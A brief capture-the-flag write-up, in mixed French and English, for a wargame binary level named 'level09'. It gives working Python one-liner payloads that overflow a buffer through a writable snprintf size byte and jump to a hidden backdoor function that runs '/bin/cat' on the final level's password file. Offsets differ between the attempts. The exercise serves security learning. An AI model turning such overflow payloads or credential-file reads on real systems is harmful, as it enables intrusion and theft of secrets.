13 lines
964 B
Plaintext
13 lines
964 B
Plaintext
/home/users/level09/level09 < <(python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')")
|
|
|
|
python -c "print('a'*40+'\xff'+' '*208+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09
|
|
|
|
Avec ghidra on trouve une fonction cache secret backdoor, on va essayer de l'appeler.
|
|
|
|
We notice an small breach on the snprintf, the size arguement is writable with the 41th character of the username, we put 0xFF because it is the largest, then we can to a ret to the secret backdoor function which calls system, with spaces and a cat of the last flag it works !
|
|
|
|
|
|
This should win :
|
|
python -c "print('a'*40+'\xff'+' '*204+'/bin/cat /home/users/end/.pass ;AAAIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTT\x8c\x48\x55\x55\x55\x55\x00\x00')" | env -i /home/users/level09/level09
|
|
|